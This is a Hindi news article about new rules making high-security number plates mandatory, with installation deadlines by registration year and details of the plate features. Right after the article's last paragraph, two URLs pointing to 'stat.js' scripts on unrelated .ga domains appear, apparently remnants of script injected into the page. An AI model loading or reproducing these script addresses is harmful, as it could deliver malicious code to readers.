अब वाहन मालिक हो जाए खुश क्योकि अब वाहन के चोरी होने का खतरा है जाएगा कम। वाहनो की सुरक्षा बढ़ाने के लिए शासन ने वाहनों पर नया हाई सेक्योरिटी नंबर प्लेट कर दिया है अनिवार्य। दरअसल, वाहनों की सुरक्षा बढ़ाने के लिए शासन ने वाहनों पर नया हाई सेक्योरिटी नंबर प्लेट लगवाना अनिवार्य कर दिया है। आपको बता दें, परिवहन विभाग अब बिना हाई सेक्योरिटी नंबर प्लेट के वाहनों के अभिलेखों से संबंधित कोई भी कार्य नहीं किये जाएंगे। यानी, न फिटनेस प्रमाण पत्र बनेगा और न ही वाहनों के पंजीयन का नवीनीकरण होगा।

 

बता दें, हाई सेक्योरिटी नंबर प्लेट लगाने के लिए प्रशासन द्वारा निर्देश भी जारी कर दिया गया है। 2005 से पहले के पंजीकृत समस्त वाहनों का चार माह में हाई सेक्योरिटी नंबर प्लेट लगाना अनिवार्य है। 2005 से 2010 के बीच पंजीकृत वाहनों पर छह माह में, 2010 से 2015 तक पंजीकृत वाहनों पर आठ माह में तथा 2015 से 2019 के बीच पंजीकृत वाहनों पर दस माह में हाई सेक्योरिटी नंबर प्लेट लगाना होगा।

 

 

आपको बता दें, हाई सिक्योरिटी नंबर प्लेट पर होलोग्राम बना होगा जिससे किसी दुर्घटना होने पर वाहन मालिक और गाड़ी के विषय में जानकारी मिलेगी। नंबर प्लेट पर आईएनडी लिखा होगा और इसके साथ ही इसमें क्रोमियम प्लेटेड नंबर और इंबॉस रहते है, जिससे रात के समय कैमरे के द्वारा इसकी निगरानी की जा सकती है।
आपको बता दें, हाई सेक्योरिटी नंबर प्लेट वाहन डीलर के यहां ही लगेंगे। इसके लिए वाहन स्वामी को डीलर प्वाइंट पर संपर्क करना होगा। सहायक संभागीय परिवहन अधिकारी प्रशासन श्याम लाल के अनुसार शासन का दिशा-निर्देश मिल चुका है। इसके लिए डीलरों और संबंधित अधिकारियों और कर्मचारियों को निर्देशित कर दिया गया है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.